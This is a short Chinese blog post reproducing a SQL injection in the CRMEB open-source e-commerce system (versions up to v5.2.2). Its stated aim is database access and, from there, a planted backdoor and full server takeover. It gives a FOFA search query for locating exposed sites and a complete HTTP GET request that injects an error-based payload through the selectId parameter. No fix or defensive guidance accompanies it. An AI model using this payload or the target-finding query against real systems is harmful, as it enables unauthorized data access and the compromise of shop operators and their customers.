Babing
Published on 2024-08-30 / 3 Visits
0
0

X13-1西安众邦-CRMEB开源电商系统-SQL

X13-1西安众邦-CRMEB开源电商系统-SQL

漏洞描述:

该漏洞可利用SQL注入,获取后台数据库权限,获取绝对路径写入后门文件,进而接管服务器权限。互联网资产受影响资产占比

影响版本:

CRMEB <= v.5.2.2

网站图片:

网站图片

fofa语法:

body=“/wap/first/zsff/iconfont/iconfont.css” || body=“CRMEB”

漏洞复现:

payload:

GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,user()))),0x7e),3550) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

效果图:
效果图


Comment